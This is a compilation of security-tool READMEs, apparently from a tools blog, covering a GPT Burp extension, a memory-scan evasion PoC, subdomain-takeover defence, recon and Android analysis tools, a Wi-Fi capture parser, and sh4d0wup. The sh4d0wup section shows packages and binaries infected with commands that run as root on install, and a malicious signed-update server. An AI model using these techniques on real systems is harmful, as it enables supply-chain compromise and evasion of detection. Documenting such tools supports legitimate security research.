Burpgpt - A Burp Suite Extension That Integrates OpenAI's GPT To Perform An Additional Passive Scan For Discovering Highly Bespoke Vulnerabilities, And Enables Running Traffic-Based Analysis Of Any Type

By: Zion3R


burpgpt leverages the power of AI to detect security vulnerabilities that traditional scanners might miss. It sends web traffic to an OpenAI model specified by the user, enabling sophisticated analysis within the passive scanner. This extension offers customisable prompts that enable tailored web traffic analysis to meet the specific needs of each user. Check out the Example Use Cases section for inspiration.

The extension generates an automated security report that summarises potential security issues based on the user's prompt and real-time data from Burp-issued requests. By leveraging AI and natural language processing, the extension streamlines the security assessment process and provides security professionals with a higher-level overview of the scanned application or endpoint. This enables them to more easily identify potential security issues and prioritise their analysis, while also covering a larger potential attack surface.

[!WARNING] Data traffic is sent to OpenAI for analysis. If you have concerns about this or are using the extension for security-critical applications, it is important to carefully consider this and review OpenAI's Privacy Policy for further information.

[!WARNING] While the report is automated, it still requires triaging and post-processing by security professionals, as it may contain false positives.

[!WARNING] The effectiveness of this extension is heavily reliant on the quality and precision of the prompts created by the user for the selected GPT model. This targeted approach will help ensure the GPT model generates accurate and valuable results for your security analysis.


Features

  • Adds a passive scan check, allowing users to submit HTTP data to an OpenAI-controlled GPT model for analysis through a placeholder system.
  • Leverages the power of OpenAI's GPT models to conduct comprehensive traffic analysis, enabling detection of various issues beyond just security vulnerabilities in scanned applications.
  • Enables granular control over the number of GPT tokens used in the analysis by allowing for precise adjustments of the maximum prompt length.
  • Offers users multiple OpenAI models to choose from, allowing them to select the one that best suits their needs.
  • Empowers users to customise prompts and unleash limitless possibilities for interacting with OpenAI models. Browse through the Example Use Cases for inspiration.
  • Integrates with Burp Suite, providing all native features for pre- and post-processing, including displaying analysis results directly within the Burp UI for efficient analysis.
  • Provides troubleshooting functionality via the native Burp Event Log, enabling users to quickly resolve communication issues with the OpenAI API.

Requirements

  1. System requirements:
  • Operating System: Compatible with Linux, macOS, and Windows operating systems.

  • Java Development Kit (JDK): Version 11 or later.

  • Burp Suite Professional or Community Edition: Version 2023.3.2 or later.

    [!IMPORTANT] Please note that using any version lower than 2023.3.2 may result in a java.lang.NoSuchMethodError. It is crucial to use the specified version or a more recent one to avoid this issue.

  2. Build tool:
  • Gradle: Version 6.9 or later (recommended). The build.gradle file is provided in the project repository.
  3. Environment variables:
  • Set up the JAVA_HOME environment variable to point to the JDK installation directory.

Please ensure that all system requirements, including a compatible version of Burp Suite, are met before building and running the project. Note that the project's external dependencies will be automatically managed and installed by Gradle during the build process. Adhering to the requirements will help avoid potential issues and reduce the need for opening new issues in the project repository.

Installation

1. Compilation

  1. Ensure you have Gradle installed and configured.

  2. Download the burpgpt repository:

    git clone https://github.com/aress31/burpgpt
    cd .\burpgpt\
  3. Build the standalone jar:

    ./gradlew shadowJar

2. Loading the Extension Into Burp Suite

To install burpgpt in Burp Suite, first go to the Extensions tab and click on the Add button. Then, select the burpgpt-all jar file located in the .\lib\build\libs folder to load the extension.

Usage

To start using burpgpt, users need to complete the following steps in the Settings panel, which can be accessed from the Burp Suite menu bar:

  1. Enter a valid OpenAI API key.
  2. Select a model.
  3. Define the max prompt size. This field controls the maximum prompt length sent to OpenAI to avoid exceeding the maxTokens of GPT models (typically around 2048 for GPT-3).
  4. Adjust or create custom prompts according to your requirements.

Once configured as outlined above, the Burp passive scanner sends each request to the chosen OpenAI model via the OpenAI API for analysis, producing Informational-level severity findings based on the results.

Prompt Configuration

burpgpt enables users to tailor the prompt for traffic analysis using a placeholder system. To include relevant information, we recommend using these placeholders, which the extension handles directly, allowing dynamic insertion of specific values into the prompt:

Placeholder Description
{REQUEST} The scanned request.
{URL} The URL of the scanned request.
{METHOD} The HTTP request method used in the scanned request.
{REQUEST_HEADERS} The headers of the scanned request.
{REQUEST_BODY} The body of the scanned request.
{RESPONSE} The scanned response.
{RESPONSE_HEADERS} The headers of the scanned response.
{RESPONSE_BODY} The body of the scanned response.
{IS_TRUNCATED_PROMPT} A boolean value that is programmatically set to true or false to indicate whether the prompt was truncated to the Maximum Prompt Size defined in the Settings.

These placeholders can be used in the custom prompt to dynamically generate a request/response analysis prompt that is specific to the scanned request.
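Conceptually, the placeholder system is plain string substitution plus truncation bookkeeping. A rough sketch of the idea, in Python for brevity (burpgpt itself is written in Java, so this is an illustration rather than the extension's code):

def build_prompt(template, values, max_prompt_size):
    # Substitute the data placeholders first
    prompt = template
    for name, value in values.items():
        prompt = prompt.replace("{%s}" % name, value)
    # Enforce the Maximum Prompt Size setting and record whether data was cut off
    truncated = len(prompt) > max_prompt_size
    prompt = prompt[:max_prompt_size]
    return prompt.replace("{IS_TRUNCATED_PROMPT}", "true" if truncated else "false")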

[!NOTE] Burp Suite provides the capability to support arbitrary placeholders through the use of Session handling rules or extensions such as Custom Parameter Handler, allowing for even greater customisation of the prompts.

Example Use Cases

The following list of example use cases showcases the bespoke and highly customisable nature of burpgpt, which enables users to tailor their web traffic analysis to meet their specific needs.

  • Identifying potential vulnerabilities in web applications that use a crypto library affected by a specific CVE:

    Analyse the request and response data for potential security vulnerabilities related to the {CRYPTO_LIBRARY_NAME} crypto library affected by CVE-{CVE_NUMBER}:

    Web Application URL: {URL}
    Crypto Library Name: {CRYPTO_LIBRARY_NAME}
    CVE Number: CVE-{CVE_NUMBER}
    Request Headers: {REQUEST_HEADERS}
    Response Headers: {RESPONSE_HEADERS}
    Request Body: {REQUEST_BODY}
    Response Body: {RESPONSE_BODY}

    Identify any potential vulnerabilities related to the {CRYPTO_LIBRARY_NAME} crypto library affected by CVE-{CVE_NUMBER} in the request and response data and report them.
  • Scanning for vulnerabilities in web applications that use biometric authentication by analysing request and response data related to the authentication process:

    Analyse the request and response data for potential security vulnerabilities related to the biometric authentication process:

    Web Application URL: {URL}
    Biometric Authentication Request Headers: {REQUEST_HEADERS}
    Biometric Authentication Response Headers: {RESPONSE_HEADERS}
    Biometric Authentication Request Body: {REQUEST_BODY}
    Biometric Authentication Response Body: {RESPONSE_BODY}

    Identify any potential vulnerabilities related to the biometric authentication process in the request and response data and report them.
  • Analysing the request and response data exchanged between serverless functions for potential security vulnerabilities:

    Analyse the request and response data exchanged between serverless functions for potential security vulnerabilities:

    Serverless Function A URL: {URL}
    Serverless Function B URL: {URL}
    Serverless Function A Request Headers: {REQUEST_HEADERS}
    Serverless Function B Response Headers: {RESPONSE_HEADERS}
    Serverless Function A Request Body: {REQUEST_BODY}
    Serverless Function B Response Body: {RESPONSE_BODY}

    Identify any potential vulnerabilities in the data exchanged between the two serverless functions and report them.
  • Analysing the request and response data for potential security vulnerabilities specific to a Single-Page Application (SPA) framework:

    Analyse the request and response data for potential security vulnerabilities specific to the {SPA_FRAMEWORK_NAME} SPA framework:

    Web Application URL: {URL}
    SPA Framework Name: {SPA_FRAMEWORK_NAME}
    Request Headers: {REQUEST_HEADERS}
    Response Headers: {RESPONSE_HEADERS}
    Request Body: {REQUEST_BODY}
    Response Body: {RESPONSE_BODY}

    Identify any potential vulnerabilities related to the {SPA_FRAMEWORK_NAME} SPA framework in the request and response data and report them.

Roadmap

  • Add a new field to the Settings panel that allows users to set the maxTokens limit for requests, thereby limiting the request size.
  • Add support for connecting to a local instance of the AI model, allowing users to run and interact with the model on their local machines, potentially improving response times and data privacy.
  • Retrieve the precise maxTokens value for each model to transmit the maximum allowable data and obtain the most extensive GPT response possible.
  • Implement persistent configuration storage to preserve settings across Burp Suite restarts.
  • Enhance the code for accurate parsing of GPT responses into the Vulnerability model for improved reporting.

Project Information

The extension is currently under development and we welcome feedback, comments, and contributions to make it even better.

Sponsor

If this extension has saved you time and hassle during a security assessment, consider showing some love by sponsoring a cup of coffee for the developer. It's the fuel that powers development, after all. Just hit that shiny Sponsor button at the top of the page or click here to contribute and keep the caffeine flowing.

Reporting Issues

Did you find a bug? Well, don't just let it crawl around! Let's squash it together like a couple of bug whisperers!

Please report any issues on the GitHub issues tracker. Together, we'll make this extension as reliable as a cockroach surviving a nuclear apocalypse!

Contributing

Looking to make a splash with your mad coding skills?

Awesome! Contributions are welcome and greatly appreciated. Please submit all PRs on the GitHub pull requests tracker. Together we can make this extension even more amazing!

License

See LICENSE.



RustChain - Hide Memory Artifacts Using ROP And Hardware Breakpoints

By: Zion3R


This tool is a simple PoC of how to hide memory artifacts using a ROP chain in combination with hardware breakpoints. The ROP chain changes the main module's memory page protections to N/A while sleeping (i.e. when the function Sleep is called). For more detailed information about this memory scanning evasion technique, check out the original project, Gargoyle. x64 only.

The idea is to set up a hardware breakpoint on kernel32!Sleep and a new top-level exception filter to handle the exception. When Sleep is called, the exception filter function set up beforehand is triggered, allowing us to call the ROP chain without the need for classic function hooks. This way, we avoid leaving weird and unusual private memory regions in the process related to well-known DLLs.

The ROP chain simply calls VirtualProtect() to set the current memory page to N/A, then calls SleepEx, and finally restores the RX memory protection.


The overview of the process is as follows:

  • We use SetUnhandledExceptionFilter to set a new exception filter function.
  • SetThreadContext is used in order to set a hardware breakpoint on kernel32!Sleep.
  • We call Sleep, triggering the hardware breakpoint and driving the execution flow towards our exception filter function.
  • The ROP chain is called from the exception filter function, allowing us to change the current memory page protection to N/A. Then SleepEx is called. Finally, the ROP chain restores the RX memory protection and normal execution continues.

This process repeats indefinitely.

As can be seen in the image, the main module's memory protection is changed to N/A while sleeping, which defeats memory scans looking for pages with execution permission.

Compilation

Since we are using LITCRYPT plugin to obfuscate string literals, it is required to set up the environment variable LITCRYPT_ENCRYPT_KEY before compiling the code:

C:\Users\User\Desktop\RustChain> set LITCRYPT_ENCRYPT_KEY="yoursupersecretkey"

After that, simply compile the code and run the tool:

C:\Users\User\Desktop\RustChain> cargo build
C:\Users\User\Desktop\RustChain\target\debug> rustchain.exe

Limitations

This tool is just a PoC and some extra features should be implemented in order to be fully functional. The main purpose of the project was to learn how to implement a ROP chain and integrate it within Rust. Because of that, this tool will only work if you use it as it is, and failures are expected if you try to use it in other ways (for example, compiling it to a dll and trying to reflectively load and execute it).

Credits



Domain-Protect - OWASP Domain Protect - Prevent Subdomain Takeover

By: Zion3R

OWASP Global AppSec Dublin - talk and demo


Features

  • scan Amazon Route53 across an AWS Organization for domain records vulnerable to takeover
  • scan Cloudflare for vulnerable DNS records
  • take over vulnerable subdomains yourself before attackers and bug bounty researchers
  • automatically create known issues in Bugcrowd or HackerOne
  • vulnerable domains in Google Cloud DNS can be detected by Domain Protect for GCP
  • manual scans of cloud accounts with no installation

Installation

Collaboration

We welcome collaborators! Please see the OWASP Domain Protect website for more details.

Documentation

Manual scans - AWS
Manual scans - CloudFlare
Architecture
Database
Reports
Automated takeover optional feature
Cloudflare optional feature
Bugcrowd optional feature
HackerOne optional feature
Vulnerability types
Vulnerable A records (IP addresses) optional feature
Requirements
Installation
Slack Webhooks
AWS IAM policies
CI/CD
Development
Code Standards
Automated Tests
Manual Tests
Conference Talks and Blog Posts

Limitations

This tool cannot guarantee 100% protection against subdomain takeovers.



Sh4D0Wup - Signing-key Abuse And Update Exploitation Framework


Signing-key abuse and update exploitation framework.

% docker run -it --rm ghcr.io/kpcyrd/sh4d0wup:edge -h
Usage: sh4d0wup [OPTIONS] <COMMAND>

Commands:
bait Start a malicious update server
front Bind a http/https server but forward everything unmodified
infect High level tampering, inject additional commands into a package
tamper Low level tampering, patch a package database to add malicious packages, cause updates or influence dependency resolution
keygen Generate signing keys with the given parameters
sign Use signing keys to generate signatures
hsm Interact with hardware signing keys
build Compile an attack based on a plot
check Check if the plot can still execute correctly against the configured image
req Emulate a http request to test routing and selectors
completions Generate shell completions
help Print this message or the help of the given subcommand(s)

Options:
-v, --verbose... Increase logging output (can be used multiple times)
-q, --quiet... Reduce logging output (can be used multiple times)
-h, --help Print help information
-V, --version Print version information

What are shadow updates?

Have you ever wondered if the update you downloaded is the same one everybody else gets, or did you get a different one that was made just for you? Shadow updates are updates that officially don't exist but carry valid signatures and would get accepted by clients as genuine. This may happen if the signing key is compromised by hackers or if a release engineer with legitimate access turns grimy.

sh4d0wup is a malicious http/https update server that acts as a reverse proxy in front of a legitimate server and can infect + sign various artifact formats. Attacks are configured in plots that describe how http request routing works, how artifacts are patched/generated, how they should be signed, and with which key. A route can have selectors so it matches only if, e.g., the user-agent matches a pattern or the client is connecting from a specific IP address. For development and testing, mock signing keys/certificates can be generated and marked as trusted.

Compile a plot

Some plots are more complex to run than others; to avoid long startup times due to downloads and artifact patching, you can build a plot in advance. This also allows you to create signatures in advance.

sh4d0wup build ./contrib/plot-hello-world.yaml -o ./plot.tar.zst

Run a plot

This spawns a malicious http update server according to the plot. This command also accepts yaml files, but they may take longer to start.

sh4d0wup bait -B 0.0.0.0:1337 ./plot.tar.zst

You can find examples here:

Infect an artifact

sh4d0wup infect elf

% sh4d0wup infect elf /usr/bin/sh4d0wup -c id a.out
[2022-12-19T23:50:52Z INFO sh4d0wup::infect::elf] Spawning C compiler...
[2022-12-19T23:50:52Z INFO sh4d0wup::infect::elf] Generating source code...
[2022-12-19T23:50:57Z INFO sh4d0wup::infect::elf] Waiting for compile to finish...
[2022-12-19T23:51:01Z INFO sh4d0wup::infect::elf] Successfully generated binary
% ./a.out help
uid=1000(user) gid=1000(user) groups=1000(user),212(rebuilderd),973(docker),998(wheel)
Usage: a.out [OPTIONS] <COMMAND>

Commands:
bait Start a malicious update server
infect High level tampering, inject additional commands into a package
tamper Low level tampering, patch a package database to add malicious packages, cause updates or influence dependency resolution
keygen Generate signing keys with the given parameters
sign Use signing keys to generate signatures
hsm Interact with hardware signing keys
build Compile an attack based on a plot
check Check if the plot can still execute correctly against the configured image
completions Generate shell completions
help Print this message or the help of the given subcommand(s)

Options:
-v, --verbose... Turn debugging information on
-h, --help Print help information

sh4d0wup infect pacman

% sh4d0wup infect pacman --set 'pkgver=0.2.0-2' /var/cache/pacman/pkg/sh4d0wup-0.2.0-1-x86_64.pkg.tar.zst -c id sh4d0wup-0.2.0-2-x86_64.pkg.tar.zst
[2022-12-09T16:08:11Z INFO sh4d0wup::infect::pacman] This package has no install hook, adding one from scratch...
% sudo pacman -U sh4d0wup-0.2.0-2-x86_64.pkg.tar.zst
loading packages...
resolving dependencies...
looking for conflicting packages...

Packages (1) sh4d0wup-0.2.0-2

Total Installed Size: 13.36 MiB
Net Upgrade Size: 0.00 MiB

:: Proceed with installation? [Y/n]
(1/1) checking keys in keyring [#######################################] 100%
(1/1) checking package integrity [#######################################] 100%
(1/1) loading package files [#######################################] 100%
(1/1) checking for file conflicts [#######################################] 100%
(1/1) checking available disk space [#######################################] 100%
:: Processing package changes...
(1/1) upgrading sh4d0wup [#######################################] 100%
uid=0(root) gid=0(root) groups=0(root)
:: Running post-transaction hooks...
(1/2) Arming ConditionNeedsUpdate...
(2/2) Notifying arch-audit-gtk

sh4d0wup infect deb

% sh4d0wup infect deb /var/cache/apt/archives/apt_2.2.4_amd64.deb -c id ./apt_2.2.4-1_amd64.deb --set Version=2.2.4-1
[2022-12-09T16:28:02Z INFO sh4d0wup::infect::deb] Patching "control.tar.xz"
% sudo apt install ./apt_2.2.4-1_amd64.deb
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
Note, selecting 'apt' instead of './apt_2.2.4-1_amd64.deb'
Suggested packages:
apt-doc aptitude | synaptic | wajig dpkg-dev gnupg | gnupg2 | gnupg1 powermgmt-base
Recommended packages:
ca-certificates
The following packages will be upgraded:
apt
1 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
Need to get 0 B/1491 kB of archives.
After this operation, 0 B of additional disk space will be used.
Get:1 /apt_2.2.4-1_amd64.deb apt amd64 2.2.4-1 [1491 kB]
debconf: delaying package configuration, since apt-utils is not installed
(Reading database ... 6661 files and directories currently installed.)
Preparing to unpack /apt_2.2.4-1_amd64.deb ...
Unpacking apt (2.2.4-1) over (2.2.4) ...
Setting up apt (2.2.4-1) ...
uid=0(root) gid=0(root) groups=0(root)
Processing triggers for libc-bin (2.31-13+deb11u5) ...

sh4d0wup infect oci

Bruteforce git commit partial collisions

Here's a short one-liner showing how to take the latest commit from a git repository, send it to a remote computer that has sh4d0wup installed to tweak it until the commit id starts with the provided --collision-prefix, and then insert the new commit back into the repository on your local computer:

% git cat-file commit HEAD | ssh lots-o-time nice sh4d0wup tamper git-commit --stdin --collision-prefix 7777 --strip-header | git hash-object -w -t commit --stdin

This may take some time; eventually it shows a commit id that you can use to create a new branch:

git show 777754fde8...
git branch some-name 777754fde8...
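The underlying search is straightforward: a git commit id is the SHA-1 of the commit's canonical object bytes, so the tool can mutate some harmless part of the commit and re-hash until the id starts with the desired prefix. A toy Python version of that loop (the nonce trailer is an illustrative mutation; sh4d0wup's actual tampering strategy may differ):

import hashlib

def git_commit_id(body: bytes) -> str:
    # A git object id is the SHA-1 of "<type> <size>\0<content>"
    header = b"commit %d\x00" % len(body)
    return hashlib.sha1(header + body).hexdigest()

def bruteforce_prefix(body: bytes, prefix: str):
    # Append a nonce line and increment it until the id matches the prefix
    nonce = 0
    while True:
        candidate = body + b"nonce: %d\n" % nonce
        digest = git_commit_id(candidate)
        if digest.startswith(prefix):
            return candidate, digest
        nonce += 1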


Scriptkiddi3 - Streamline Your Recon And Vulnerability Detection Process With SCRIPTKIDDI3, A Recon And Initial Vulnerability Detection Tool Built Using Shell Script And Open Source Tools


Streamline your recon and vulnerability detection process with SCRIPTKIDDI3, A recon and initial vulnerability detection tool built using shell script and open source tools.

How it works β€’ Installation β€’ Usage β€’ MODES β€’ For Developers β€’ Credits

Introducing SCRIPTKIDDI3, a powerful recon and initial vulnerability detection tool for Bug Bounty Hunters. Built using a variety of open-source tools and a shell script, SCRIPTKIDDI3 allows you to quickly and efficiently run a scan on the target domain and identify potential vulnerabilities.

SCRIPTKIDDI3 begins by performing recon on the target system, collecting information such as subdomains and running services with nuclei. It then uses this information to scan for known vulnerabilities and potential attack vectors, alerting you to any high-risk issues that may need to be addressed.

In addition, SCRIPTKIDDI3 also includes features for identifying misconfigurations and insecure default settings with nuclei templates, helping you ensure that your systems are properly configured and secure.

SCRIPTKIDDI3 is an essential tool for conducting thorough and effective recon and vulnerability assessments. Let's Find Bugs with SCRIPTKIDDI3

[Thanks ChatGPT for the Description]


How it Works ?

This tool mainly performs 3 tasks

  1. Effective Subdomain Enumeration from Various Tools
  2. Get URLs with open HTTP and HTTPS service.
  3. Run Nuclei and other scans on the previous output. So basically, this is an automation script for your initial recon in bug bounty (a conceptual sketch of the pipeline follows below).
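Conceptually, the pipeline chains external tools, each feeding the next. The sketch below, in Python for illustration, assumes subfinder, httpx, and nuclei are on PATH (httpx is not named in the README and is an assumption; the shell script's actual tool set and flags differ):

import subprocess

def run(cmd, stdin=""):
    # Run one tool, feed it the previous stage's output, return its stdout
    return subprocess.run(cmd, input=stdin, capture_output=True, text=True).stdout

# 1. Subdomain enumeration (subfinder is one of the wrapped tools)
subs = run(["subfinder", "-d", "target.com", "-silent"])
# 2. Keep only hosts answering over HTTP/HTTPS
alive = run(["httpx", "-silent"], stdin=subs)
# 3. Run nuclei templates against the live URLs
print(run(["nuclei"], stdin=alive))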

Install SCRIPTKIDDI3

SCRIPTKIDDI3 requires different tools to run successfully. Run the following commands to install the latest version with all requirements:

git clone https://github.com/thecyberneh/scriptkiddi3.git
cd scriptkiddi3
bash installer.sh

Usage

scriptkiddi3 -h

This will display help for the tool. Here are all the switches it supports.

[ABOUT:]
Streamline your recon and vulnerability detection process with SCRIPTKIDDI3,
A recon and initial vulnerability detection tool built using shell script and open source tools.


[Usage:]
scriptkiddi3 [MODE] [FLAGS]
scriptkiddi3 -m EXP -d target.com -c /path/to/config.yaml


[MODES:]
['-m'/'--mode']
Available Options for MODE:
SUB | sub | SUBDOMAIN | subdomain Run scriptkiddi3 in SUBDOMAIN ENUMERATION mode
URL | url Run scriptkiddi3 in URL ENUMERATION mode
EXP | exp | EXPLOIT | exploit Run scriptkiddi3 in Full Exploitation mode


Features of EXPLOIT mode: subdomain enumeration, URL Enumeration,
Vulnerability Detection with Nuclei,
and Scan for SUBDOMAIN TAKEOVER

[FLAGS:]
[TARGET:] -d, --domain target domain to scan

[CONFIG:] -c, --config path of your configuration file for subfinder

[HELP:] -h, --help to get help menu

[UPDATE:] -u, --update to update tool

[Examples:]
Run scriptkiddi3 in full Exploitation mode
scriptkiddi3 -m EXP -d target.com


Use your own CONFIG file for subfinder
scriptkiddi3 -m EXP -d target.com -c /path/to/config.yaml


Run scriptkiddi3 in SUBDOMAIN ENUMERATION mode
scriptkiddi3 -m SUB -d target.com


Run scriptkiddi3 in URL ENUMERATION mode
scriptkiddi3 -m URL -d target.com

MODES

1. FULL EXPLOITATION MODE

Run SCRIPTKIDDI3 in FULL EXPLOITATION MODE

  scriptkiddi3 -m EXP -d target.com

FULL EXPLOITATION MODE contains following functions

  • Effective Subdomain Enumeration with different services and open source tools
  • Effective URL Enumeration ( HTTP and HTTPs service )
  • Run Vulnerability Detection with Nuclei
  • Subdomain Takeover Test on previous results

2. SUBDOMAIN ENUMERATION MODE

Run scriptkiddi3 in SUBDOMAIN ENUMERATION MODE

  scriptkiddi3 -m SUB -d target.com

SUBDOMAIN ENUMERATION MODE contains following functions

  • Effective Subdomain Enumeration with different services and open source tools
  • You can use this mode if you only want to get subdomains from this tool; in other words, an automation of subdomain enumeration by different tools

3. URL ENUMERATION MODE

Run scriptkiddi3 in URL ENUMERATION MODE

  scriptkiddi3 -m URL -d target.com

URL ENUMERATION MODE contains following functions

  • Same features as SUBDOMAIN ENUMERATION MODE, but also identifies HTTP or HTTPS services

Using your own CONFIG File for subfinder

  scriptkiddi3 -m EXP -d target.com -c /path/to/config.yaml

You can also provide your own CONFIG file with your API keys for subdomain enumeration with subfinder.

Updating the tool to the latest version: run the following command to update the tool:

  scriptkiddi3 -u

An Example of config.yaml

binaryedge:
- 0bf8919b-aab9-42e4-9574-d3b639324597
- ac244e2f-b635-4581-878a-33f4e79a2c13
censys:
- ac244e2f-b635-4581-878a-33f4e79a2c13:dd510d6e-1b6e-4655-83f6-f347b363def9
certspotter: []
passivetotal:
- sample-email@user.com:sample_password
securitytrails: []
shodan:
- AAAAClP1bJJSRMEYJazgwhJKrggRwKA
github:
- ghp_lkyJGU3jv1xmwk4SDXavrLDJ4dl2pSJMzj4X
- ghp_gkUuhkIYdQPj13ifH4KA3cXRn8JD2lqir2d4
zoomeye:
- zoomeye_username:zoomeye_password

For Developers

If you have ideas for new functionality or modes that you would like to see in this tool, you can always submit a pull request (PR) to contribute your changes.

If you have any other queries, you can always contact me on Twitter(thecyberneh)

Credits

I would like to express my gratitude to all of the open source projects that have made this tool possible and have made recon tasks easier to accomplish.



QuadraInspect - Android Framework That Integrates AndroPass, APKUtil, And MobFS, Providing A Powerful Tool For Analyzing The Security Of Android Applications


The security of mobile devices has become a critical concern due to the increasing amount of sensitive data being stored on them. With the rise of Android OS as the most popular mobile platform, the need for effective tools to assess its security has also increased. In response to this need, a new Android framework has emerged that combines a set of powerful tools - AndroPass, APKUtil, RMS, and MobFS - to conduct comprehensive vulnerability analysis of Android applications. This framework is known as QuadraInspect.

QuadraInspect is an Android framework that integrates AndroPass, APKUtil, RMS and MobFS, providing a powerful tool for analyzing the security of Android applications. AndroPass is a tool that focuses on analyzing the security of Android applications' authentication and authorization mechanisms, while APKUtil is a tool that extracts valuable information from an APK file. Lastly, MobFS and RMS facilitate the analysis of an application's filesystem by mounting its storage in a virtual environment.

By combining these tools, QuadraInspect provides a comprehensive approach to vulnerability analysis of Android applications. This framework can be used by developers, security researchers, and penetration testers to assess the security of their own or third-party applications. QuadraInspect provides a unified interface for all of the integrated tools, making it easier to use and reducing the time required to conduct comprehensive vulnerability analysis. Ultimately, this framework aims to increase the security of Android applications and protect users' sensitive data from potential threats.


Requirements

  • Windows, Linux or Mac
  • NodeJs installed
  • Python 3 installed
  • OpenSSL-3 installed
  • Wkhtmltopdf installed

Installation

To install the tools you need to:

  1. Clone the repository: git clone https://github.com/morpheuslord/QuadraInspect
  2. Open an administrative cmd or powershell (for the MobFS setup) and run: pip install -r requirements.txt && python3 main.py
  3. Once QuadraInspect loads, run this command: QuadraInspect Main>> : START install_tools

The tools will be downloaded to the tools directory, and the setup.py and setup.bat scripts will run automatically to complete the installation.

Usage

Each module has a help function, so the commands and their descriptions are detailed and can be consulted for operation.

These are the key points that must be addressed for smooth working:

  • The APK file or target must be declared before starting any attack
  • The attacks are separate entities combined via this framework; doing research on how to use them is recommended
  • The APK file can be declared either using args or using SET target within the tool
  • The target APK file must be placed in the target folder, as all the tools search for the target file within that folder

Modes

There are 2 modes:

|
└─> F mode
└─> A mode

F mode

The F mode is a mode where you get the active interface for using the interactive version of the framework, with the prompt and so on.

F mode is the normal mode and can be used easily

A mode

A mode, or argumentative mode, takes the input via arguments and runs the commands without any intervention by the user. This is currently limited to the main menu; in the future I am planning to extend this feature to the incorporated tools as well.

python main.py --target <APK_file> --mode a --command install_tools/tools_name/apkleaks/mobfs/rms/apkleaks

Main Module

the main menu of the entire tool has these options and commands:

Command Description
SET target SET the name of the target file
START install_tools If not installed, this will install the tools
LIST tools_name List the integrated tools
START apkleaks Use the APKLeaks tool
START mobfs Use MobFS for dynamic and static analysis
START andropass Use the AndroPass APK analyzer
help Display help menu
SHOW banner Display banner
quit Quit the program

As mentioned above, the target must be set before any tool is used.

Apkleaks menu

The APKLeaks menu is also really straightforward, with only a few things to consider:

  • The options SET output and SET json-out take file names, not the actual files; the output is created in the result directory.
  • The SET pattern option takes the name of a JSON pattern file. The JSON file must be located in the pattern directory.
Option Description
SET output Output for the scan data file name
SET arguments Additional Disassembly arguments
SET json-out JSON output file name
SET pattern The pre-searching pattern for secrets
help Displays help menu
return Return to main menu
quit Quit the tool

Mobfs

MobFS is pretty straightforward; only the port number must be taken care of, which is 5000 by default. You just need to start the program and connect to it at 127.0.0.1:5000 in your browser.

AndroPass

AndroPass is also really straightforward: it just takes the file as input and does its job without any other inputs.

Architecture:

The APK analysis framework will follow a modular architecture, similar to Metasploit. It will consist of the following modules:

  • Core module: The core module will provide the basic functionality of the framework, such as command-line interface, input/output handling, and logging.
  • Static analysis module: The static analysis module will be responsible for analyzing the structure and content of APK files, such as the manifest file, resources, and code.
  • Dynamic analysis module: The dynamic analysis module will be responsible for analyzing the behavior of APK files, such as network traffic, API calls, and file system interactions.
  • Reverse engineering module: The reverse engineering module will be responsible for decompiling and analyzing the source code of APK files.
  • Vulnerability testing module: The vulnerability testing module will be responsible for testing the security of APK files, such as identifying vulnerabilities and exploits.

Adding more

Currently there are only 3 integrated tools, but more can be added; these are the things to consider:

  • Installer function
  • Separate tool function
  • Main function

Installer Function

  • Must be edited in config/installer.py
  • The main thing to consider in the installer is the link to the repository
  • Keep the cloner and the directory in a try-except block to avoid errors
  • Choose an appropriate command for further installation

Separate tool function

  • Must be edited in config/mobfs.py, config/androp.py, or config/apkleaks.py
  • Write a new function for the specific tool
  • File handling is up to you; I recommend passing the file name as an argument and then using it to locate the file via the subprocess call
  • The tool invocations should also be wrapped in a try-except block to avoid unwanted errors (see the sketch below)
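A minimal sketch of such a wrapper, following the conventions above (the module path, tool location, and command are hypothetical):

# config/newtool.py - hypothetical wrapper following the conventions above
import subprocess

def run_newtool(target_file):
    # Locate the APK in the target folder and hand it to the external tool
    apk_path = "target/%s" % target_file
    try:
        subprocess.run(
            ["python3", "tools/newtool/newtool.py", apk_path],  # hypothetical tool
            check=True,
        )
    except (subprocess.CalledProcessError, FileNotFoundError) as err:
        print("[-] newtool failed: %s" % err)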

Main Function

  • A new case must be added to the switch function to act as the main function holder
  • The help menu listing and commands are up to your requirements and comfort

If you want, you can make your own upgrades and add them to this repository for more people to use, helping this tool grow.



Wifi_Db - Script To Parse Aircrack-ng Captures To A SQLite Database


Script to parse Aircrack-ng captures into a SQLite database and extract useful information like handshakes (in 22000 hashcat format), MGT identities, interesting relations between APs, clients and their Probes, WPS information, and a global view of all the APs seen.

           _   __  _             _  _     
__ __(_) / _|(_) __| || |__
\ \ /\ / /| || |_ | | / _` || '_ \
\ V V / | || _|| | | (_| || |_) |
\_/\_/ |_||_| |_| _____ \__,_||_.__/
|_____|
by r4ulcl

Features

  • Displays if a network is cloaked (hidden) even if you have the ESSID.
  • Shows a detailed table of connected clients and their respective APs.
  • Identifies client probes connected to APs, providing insight into potential security risks using Rogue APs.
  • Extracts handshakes for use with hashcat, facilitating password cracking.
  • Displays identity information from enterprise networks, including the EAP method used for authentication.
  • Generates a summary of each AP group by ESSID and encryption, giving an overview of the security status of nearby networks.
  • Provides a WPS info table for each AP, detailing information about the Wi-Fi Protected Setup configuration of the network.
  • Logs all instances when a client or AP has been seen with the GPS data and timestamp, enabling location-based analysis.
  • Upload a capture folder or file. This option supports the use of wildcards (*) to select multiple files or folders.
  • Docker version in Docker Hub to avoid dependencies.
  • Obfuscated mode for demonstrations and conferences.
  • Possibility to add static GPS data.

Install

From DockerHub (RECOMMENDED)

docker pull r4ulcl/wifi_db

Manual installation

Debian based systems (Ubuntu, Kali, Parrot, etc.)

Dependencies:

  • python3
  • python3-pip
  • tshark
  • hcxtools
sudo apt install tshark
sudo apt install python3 python3-pip

git clone https://github.com/ZerBea/hcxtools.git
cd hcxtools
make
sudo make install
cd ..

Installation

git clone https://github.com/r4ulcl/wifi_db
cd wifi_db
pip3 install -r requirements.txt

Arch

Dependencies:

  • python3
  • python3-pip
  • tshark
  • hcxtools
sudo pacman -S wireshark-qt
sudo pacman -S python-pip python

git clone https://github.com/ZerBea/hcxtools.git
cd hcxtools
make
sudo make install
cd ..

Installation

git clone https://github.com/r4ulcl/wifi_db
cd wifi_db
pip3 install -r requirements.txt

Usage

Scan with airodump-ng

Run airodump-ng saving the output with -w:

sudo airodump-ng wlan0mon -w scan --manufacturer --wps --gpsd

Create the SQLite database using Docker

#Folder with captures
